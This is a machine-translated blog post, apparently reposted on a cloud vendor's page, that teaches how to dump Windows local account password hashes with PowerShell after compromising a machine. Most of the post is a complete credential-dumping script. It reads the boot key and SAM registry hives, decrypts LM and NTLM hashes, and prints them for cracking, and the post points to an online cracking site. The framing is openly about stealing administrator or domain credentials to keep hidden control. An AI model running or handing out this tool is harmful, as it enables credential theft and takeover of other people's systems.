Get Windows System password hash via PowerShell

Source: Internet
Author: User
Tags 0xc0

When you get control of the system how can you get control of the machine for a longer period of time? As a white hat, has torn a hole in the opponent's line of defense, if you need to further expand the results, you need to do is latent, collect more information for your judgment, easy to have a greater harvest. With what method can have the highest permission, at the same time can more effectively hide themselves, is to stay webshell, leave the backdoor, species Trojan or rootkit? Webshell, even a word trojan is easy to be cleared by the administrator, put a Trojan horse, also easy to be experienced by the administrator to find out, whether it is the early self-creation process, the process was killed on the end, or the Trojan is injected into the process, or to serve self-initiated trojan, even if it is to replace the secondary system service itself started , the concealment is too bad. No matter how perfect the back door left, the Trojan does not kill to do much good, and ultimately do not leave any traces.

What is the way to achieve the goal, and not easy to be found? Managing the server as an administrator is all right? Whether the administrator is with 3389, pcanywhere, or radmin Management Server, get his password, to his identity into the system, if it is the domain administrator password, the entire domain will be under your control. Get Password method In addition to network sniffing, you can also get the password hash through the Rainbow table attack, this article will introduce the Windows system password hash through PowerShell method, what password hash is not far away from the password.

First introduce the Windows password hash:

The early SMB protocol transmits plaintext passwords over the network. Later, the "LAN Manager challenge/response" authentication mechanism, called LM, is so simple that it can be easily cracked. Microsoft has proposed a WindowsNT challenge/response verification mechanism, called NTLM. There is now an updated NTLMV2 and Kerberos authentication system. Windows encrypted passwords password, we call it hash (Chinese: hash), Windows system password hash By default generally consists of two parts: the first part is Lm-hash, the second part is Ntlm-hash.

Ntlm-hash and Lm-hash algorithm, clear text password case sensitive, but not according to Ntlm-hash determine whether the original plaintext password is less than 8 bytes, get rid of the magic string "[email protected]#$%". MD4 is a true one-way hash function, which is more difficult for the data source to appear in clear text. The problem is that Microsoft insists that Ntlm-hash's strength is high, but to avoid the fact that, in order to maintain backward compatibility, ntlm-hash default is always used with Lm-hash. This means that Ntlm-hash's emphasis on higher is not safe, but potentially damaging to security. After adding Ntlm-hash, first use Lm-hash's weaknesses to cite the original plaintext password of the case-insensitive version, and then use Ntlm-hash to correct the original plaintext password case-sensitive version.

The hash password format under Windows system is: User name: Rid:lm-hash value: Nt-hash value, for example:

ADMINISTRATOR:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC::: Indicates

User name is: Administrator

RID is: 500

The Lm-hash value is: C8825db10f2590eaaad3b435b51404ee

The Nt-hash value is: 683020925c5d8569c23aa724774ce6cc

If you know this user's hash password, take the c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc to hash online search website

Http://www.objectif-securite.ch/en/ophcrack.php It's easy to get the password.

The following code, and then a simple explanation of the code, and finally demonstrate the effect of execution.

function get-winpasshashes{<# author:fuhj (powershell#live.cn, http://fuhaijun.com) # Get Windows password hash and Returns the hash list #. Example # get-winpasshashes # #> [Cmdletbinding ()] Param () function loadapi{$oldErrorAction = $glo    Bal:erroractionpreference;    $global: erroractionpreference = "Silentlycontinue";    $test = [Powerdump.native];    $global: erroractionpreference = $oldErrorAction;     if ($test) {# already loaded return; } $code = @ ' using system;using system.security.cryptography;using system.runtime.interopservices;using System.Text; Namespace powerdump{public class Native {[DllImport ("advapi32.dll", CharSet = CharSet.Auto)] public static extern int RegOpenKeyEx (int hKey, string subkey, int uloptions, int samdesired, out in    T hkresult);        [DllImport ("advapi32.dll", EntryPoint = "RegEnumKeyEx")] extern public static int RegEnumKeyEx (int hkey, IntIndex, StringBuilder lpname, ref int lpcbname, int reserved, StringBuilder lpclass, ref    int Lpcbclass, out long lpftlastwritetime); [DllImport ("Advapi32.dll", entrypoint= "RegQueryInfoKey", Callingconvention=callingconvention.winapi, SetLastError =true)] extern public static int RegQueryInfoKey (int hkey, StringBuilder lpclass, ref int LPCBCLA        SS, int lpreserved, out int lpcsubkeys, out int lpcbmaxsubkeylen, out int Lpcbmaxclasslen, out int lpcvalues, out int lpcbmaxvaluenamelen, out int lpcbmaxvaluelen, out int Lpcbsecuritydesc    Riptor, IntPtr lpftlastwritetime);        [DllImport ("Advapi32.dll", setlasterror=true)] public static extern int RegCloseKey (int hKey); }}//End namespace Powerdump public class Shift {public static int right (int x, int count) {return x >> count; public static UINT Right (UINT x, intCount) {return x >> count;}        public static long right (long x, int count) {return x >> count;}        public static ULONG right (ulong x, int count) {return x >> count;}        public static int left (int x, int count) {return x << count;}        public static UINT Left (UINT x, int count) {return x << count;}        public static long left (long x, int count) {return x << count;}    public static ULONG left (ULONG x, int count) {return x << count;} } ' @ $provider = new-object Microsoft.CSharp.CSharpCodeProvider $dllName = [PsObject]. Assembly.location $compilerParameters = new-object System.CodeDom.Compiler.CompilerParameters $assemblies = @ ("System . dll ", $dllName) $compilerParameters. Referencedassemblies.addrange ($assemblies) $ Compilerparameters.generateinmemory = $true $compilerResults = $provider.  CompileAssemblyFromSource ($compilerParameters, $code) if ($compilerResults. errors.count-gt 0) {   $compilerResults. Errors | % {Write-error ("{0}: ' T{1}"-F $_. Line,$_. ErrorText)}}} $antpassword = [Text.encoding]::ascii. GetBytes ("Ntpassword ' 0"); $almpassword = [Text.encoding]::ascii. GetBytes ("Lmpassword ' 0"); $empty _lm = [byte[]]@ (0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5, 0x14,0x04,0xee); $empty _nt = [byte[]]@ (0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89 , 0xc0); $odd _parity = @ (1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26 , 26, 28, 28, 31, 31, 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, 49, 49, 50, 50, 52, 52, 55, 55 , 56, 59, 59, 61, 61, 62, 62, 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, 81, 81, 82, 82, 84, 84 , 87, 88, 88, 91, 91, 93, 93, 94, 94, 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, 112,112,115,115,11 7,117,118,118,121,121,122,122,124,124,127,127, 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,  161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,  176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,  193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,  208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,  224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,    241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254); function Sid_to_key ($sid) {$s 1 = @ ();    $s 1 + = [Char] ($sid-band 0xFF);    $s 1 + = [char] ([Shift]::right ($sid, 8)-band 0xFF);    $s 1 + = [char] ([Shift]::right ($sid,-band) 0xFF);    $s 1 + = [char] ([Shift]::right ($sid,-band) 0xFF);    $s 1 + = $s 1[0];    $s 1 + = $s 1[1];    $s 1 + = $s 1[2];    $s 2 = @ (); $s 2 + = $s 1[3]; $s 2 + = $s 1[0]; $s 2 + = $s 1[1];    $s 2 + = $s 1[2]; $s 2 + = $s 2[0]; $s 2 + = $s 2[1];    $s 2 + = $s 2[2]; Return, ((Str_to_key $s 1), (Str_to_key $s 2));}    function Str_to_key ($s) {$key = @ (); $key + = [Shift]:: Right ([int] ($s [0]), 1);    $key + = [Shift]::left ($ ([int] ($s [0])-band 0x01), 6)-bor [Shift]::right ([int] ($s [1]), 2);    $key + = [Shift]::left ($ ([int] ($s [1])-band 0x03), 5)-bor [Shift]::right ([int] ($s [2]), 3);    $key + = [Shift]::left ($ ([int] ($s [2])-band 0x07), 4)-bor [Shift]::right ([int] ($s [3]), 4);    $key + = [Shift]::left ($ ([int] ($s [3])-band 0x0F), 3)-bor [Shift]::right ([int] ($s [4]), 5);    $key + = [Shift]::left ($ ([int] ($s [4])-band 0x1F), 2)-bor [Shift]::right ([int] ($s [5]), 6);    $key + = [Shift]::left ($ ([int] ($s [5])-band 0x3F), 1)-bor [Shift]::right ([int] ($s [6]), 7);    $key + = $ ([int] ($s [6])-band 0x7F); 0..7 |        %{$key [$_] = [Shift]::left ($key [$_], 1);        $key [$_] = $odd _parity[$key [$_]]; } return, $key;}    function NewRC4 ([byte[]] $key) {return New-object object |    Add-member noteproperty key $key-passthru |    Add-member noteproperty S $null-passthru | Add-member scriptmethod init {if (-not $this. S) {[byte[]] $tHis.            S = 0..255; 0..255 | %-begin{[long] $j = 0;} {$j = ($j + $this. key[$ ($_% $this. Key.length)] + $this. S[$_])% $this.                S.length; $temp = $this. S[$_]; $this. S[$_] = $this. s[$j]; $this.                s[$j] = $temp;    }}}-passthru |        Add-member Scriptmethod "Encrypt" {$data = $args [0];        $this. Init (); $outbuf = New-object byte[] $ ($data.        Length); $S 2 = $this. S[0: $this.        S.length]; 0..$ ($data. LENGTH-1) | %-begin{$i =0; $j = 0;} {$i = ($i + 1)% $S 2.            Length; $j = ($j + $S 2[$i])% $S 2.            Length;            $temp = $S 2[$i]; $S 2[$i] = $S 2[$j]; $S 2[$j] = $temp;            $a = $data [$_]; $b = $S 2[$ ($S 2[$i]+ $S 2[$j])% $S 2.            Length];        $outbuf [$_] = ($a-bxor $b);    } return, $outbuf; }-passthru}function Des_encrypt ([byte[]] $data, [byte[]] $key) {return, (Des_transform $data $key $true)}function Des_de Crypt ([byte[]] $data, [byte[]] $key) {return, (Des_transform $Data $key $false)}function des_transform ([byte[]] $data, [byte[]] $key, $doEncrypt) {$des = New-object Security.cryptogra Phy.    DESCryptoServiceProvider; $des.    Mode = [SECURITY.CRYPTOGRAPHY.CIPHERMODE]::ECB; $des.    Padding = [Security.cryptography.paddingmode]::none; $des.    Key = $key;    $des. IV = $key;    $transform = $null; if ($doEncrypt) {$transform = $des.    CreateEncryptor ();} else{$transform = $des.    CreateDecryptor ();} $result = $transform. TransformFinalBlock ($data, 0, $data.    Length); return, $result;} function Get-regkeyclass ([string] $key, [string] $subkey) {switch ($Key) {"HKCR" {$nKey = 0x80000000} #HK Classe S Root "HKCU" {$nKey = 0x80000001} #HK current User ' HKLM ' {$nKey = 0x80000002} #HK Local Machine " HKU "{$nKey = 0x80000003} #HK Users" HKCC "{$nKey = 0x80000005} #HK current Config default {t Hrow "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC "}} $KEYQUERYVALUE = 0x1;    $KEYREAD = 0x19;    $KEYALLACCESS = 0x3F;    $result = ""; [INT] $hkey =0 if (-not [Powerdump.native]::regopenkeyex ($nkey, $subkey, 0, $KEYREAD, [ref] $hkey)) {$classVal = Ne W-object text.stringbuilder 1024x768 [int] $len = 1024x768 if (-not [Powerdump.native]::regqueryinfokey ($hkey, $classV            Al,[ref] $len, 0,[ref] $null, [ref] $null, [ref] $null, [ref] $null, [ref] $null, [ref] $null, [ref] $null, 0)) {        $result = $classVal. ToString ()} else {Write-error "RegQueryInfoKey failed"; } [Powerdump.native]::regclosekey ($hkey) |    Out-null} else {Write-error "Cannot open key"; } return $result;} function get-bootkey{$s = [String]::join ("", $ ("JD", "Skew1", "GBG", "Data" |%{get-regkeyclass "HKLM" "System\currentcon"    Trolset\control\lsa\$_ "}));    $b = New-object byte[] $ ($s. LENGTH/2); 0..$ ($b. Length-1) | %{$b [$_] = [Convert]::tobyte ($s. Substring ($ ($_*2), 2), +)} $b 2 = New-object byte[] 16; 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | %-begin{$i = 0;} {$b 2[$i]= $b [$_]; $i + +} return, $b 2;}    function get-hbootkey{param ([byte[]] $bootkey); $aqwerty = [Text.encoding]::ascii.    GetBytes ("[email protected]#$%^&* () qwertyuiopazxcvbnmqqqqqqqqqqqq) (*@&% ' 0"); $anum = [Text.encoding]::ascii.    GetBytes ("0123456789012345678901234567890123456789 ' 0");    $k = Get-item Hklm:\sam\sam\domains\account;    if (-not $k) {return $null} [byte[]] $F = $k. GetValue ("F"); if (-not $F) {return $null} $rc 4key = [Security.cryptography.md5]::create (). ComputeHash ($F [0x70.    0x7F] + $aqwerty + $bootkey + $anum);    $RC 4 = NewRC4 $RC 4key; Return, ($RC 4.encrypt ($F [0x80]. 0x9F]));}    function Get-username ([byte[]] $V) {if (-not $V) {return $null}; $offset = [Bitconverter]::toint32 ($V [0x0c].    0x0f],0) + 0xCC; $len = [Bitconverter]::toint32 ($V [0x10].    0x13],0); return [Text.encoding]::unicode.getstring ($V, $offset, $len);} function Get-userhAshes ($u, [byte[]] $hbootkey) {[byte[]] $enc _lm_hash = $null;    [byte[]] $enc _nt_hash = $null;        if ($u. Hashoffset + 0x28-lt $u. V.length) {$lm _hash_offset = $u. Hashoffset + 4;        $nt _hash_offset = $u. Hashoffset + 8 + 0x10; $enc _lm_hash = $u. v[$ ($lm _hash_offset):        $ ($lm _hash_offset+0x0f)]; $enc _nt_hash = $u. v[$ ($nt _hash_offset):    $ ($nt _hash_offset+0x0f)];        } elseif ($u. Hashoffset + 0x14-lt $u. V.length) {$nt _hash_offset = $u. Hashoffset + 8; $enc _nt_hash = [byte[]] $u. v[$ ($nt _hash_offset).    $ ($nt _hash_offset+0x0f)]; } return, (Decrypthashes $u. Rid $enc _lm_hash $enc _nt_hash $hbootkey);} function Decrypthashes ($rid, [byte[]] $enc _lm_hash, [byte[]] $enc _nt_hash, [byte[]] $hbootkey) {[byte[]] $lmhash = $empty _LM;    [byte[]] $nthash = $empty _nt;    # LM Hash if ($enc _lm_hash) {$lmhash = Decryptsinglehash $rid $hbootkey $enc _lm_hash $almpassword; } # NT Hash if ($enc _nt_hash) {$nthash = Decryptsinglehash $rid $hboOtkey $enc _nt_hash $antpassword; } return, ($lmhash, $nthash)}function Decryptsinglehash ($rid, [byte[]] $hbootkey, [byte[]] $enc _hash,[byte[]] $lmntstr)    {$deskeys = Sid_to_key $rid;    $MD 5 = [Security.cryptography.md5]::create ();    $RC 4_key = $md 5.ComputeHash ($hbootkey [0..0x0f] + [Bitconverter]::getbytes ($rid) + $lmntstr);    $RC 4 = NewRC4 $RC 4_key;    $obfkey = $RC 4.encrypt ($enc _hash); $hash = (Des_decrypt $obfkey [0..7] $deskeys [0]) + (Des_decrypt $obfkey [8..$ ($obfkey.    LENGTH-1)] $deskeys [1]); return, $hash;}        function get-userkeys{ls hklm:\sam\sam\domains\account\users | where {$_.            Pschildname-match "^[0-9a-fa-f]{8}$"} |            Add-member Aliasproperty KeyName Pschildname-passthru | Add-member scriptproperty Rid {[Convert]::toint32 ($this.            pschildname)}-passthru | Add-member scriptproperty V {[byte[]] ($this.            GetValue ("V"))}-passthru | Add-member scriptproperty UserName {get-username ($this. GetValue ("V"))}-passthru| Add-member scriptproperty Hashoffset {[Bitconverter]::touint32 ($this. GetValue ("V") [0x9c.    0x9f],0) + 0xCC}-passthru}function dumphashes{Loadapi $bootkey = Get-bootkey;    $hbootKey = Get-hbootkey $bootkey; Get-userkeys |        %{$hashes = get-userhashes $_ $hBootKey; "{0}:{1}:{2}:{3}:::"-f ($_. Username,$_. Rid, [bitconverter]::tostring ($hashes [0]). Replace ("-", ""). ToLower (), [Bitconverter]::tostring ($hashes [1]). Replace ("-", "").    ToLower ()); }}dumphashes}

Several functions are defined in the code defined in Get-winpasshashes, and Dumphashes is called as the entry function at the end of the function.

The run effect is as follows

Crack the code with a hash speed. ^_^

Author: Pay the Navy
Source: http://fuhj02.cnblogs.com
Copyright: This article is owned by the author and the blog Park
Reprint: Welcome reprint, in order to preserve the author's passion for Creation, please "reprint" according to the requirements, thank you
Requirements: This statement must be retained without the consent of the author; the original text must be connected in the article, otherwise the legal liability will be
Personal website: http://www.fuhaijun.com/

Get Windows System password hash via PowerShell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.